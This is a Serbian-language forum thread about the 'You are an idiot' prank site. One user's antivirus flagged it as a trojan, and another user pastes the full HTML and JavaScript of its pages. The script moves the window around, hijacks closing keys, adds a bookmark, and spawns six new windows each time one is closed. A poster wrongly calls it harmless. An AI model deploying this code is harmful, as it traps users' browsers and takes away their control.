Lucas je napisao(la):
ali kad kliknes na sliku te ribe otvori ti se ovo you are an idio*, ahahhaha ha ha aha ha
Inace neki virus
kaze Kaspersky ovako - Infected by virus Trojan.Js.Offiz
a fora je da kad zatvoris taj prozor, otvori se gomila malih

i tako do sutra
sad cu da ga killujem
Ma koji crni virus...
[code:1]<html>
<head>
<title>Welcome to feetman.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="10;URL=index3.html">
</head>
<body bgcolor="#FFFFFF" text="#000000" link="#000000" vlink="#000000" alink="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div align="center">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><p align="center"><font size="2" face="Arial, Helvetica, sans-serif">You
all ASKED for MORE...
SO... Click on her picture for <em>MORE!</em></font></p>
<p align="center"><a href="index3.html"><img src="index-pic.jpg" alt="How Dare you" width="760" height="570" border="1"></a>
</p>
<p align="center"><font face="Arial, Helvetica, sans-serif">(c) www.feetman.com
All rights reserved.</font></p>
</td>
</tr>
</table>
<p>&</p>
</div>
</body>
</html>
[/code:1]
Ovo je index strana a odavde ide auto redirect (u mojoj IP kombinaciji ili kako vec ovo cudo fnkcionise) na famoznu index3.html stranu koja ima onaj ludacki prikaz a kod je :
[code:1]<html>
<head>
<title>You are an *****!</title>
<script language=Javascript>
function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="http://www.feetman.com/index3.html";
var title="*****!";
window.external.AddFavorite(url,title);
}
}
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("You are an *****!"); }
function ctrlkey() { if (event.keyCode == 17) alert("You are an *****!"); }
function delkey() { if (event.keyCode == 46) alert("You are an *****!"); }
var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
function openWindow(url){
aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');
}
function procreate(){
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
openWindow('index3.html');
}
function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}
function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}
function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}
function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}
function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
if (flagRun == 1){
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
}
</script>
</head>
<body bgColor=#ffffff onload="flagRun=1;playBall();return true;bookmark();" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
</body>
</html>
[/code:1]
Ja ovde ne vidim nikakav maliciozni kod.. type;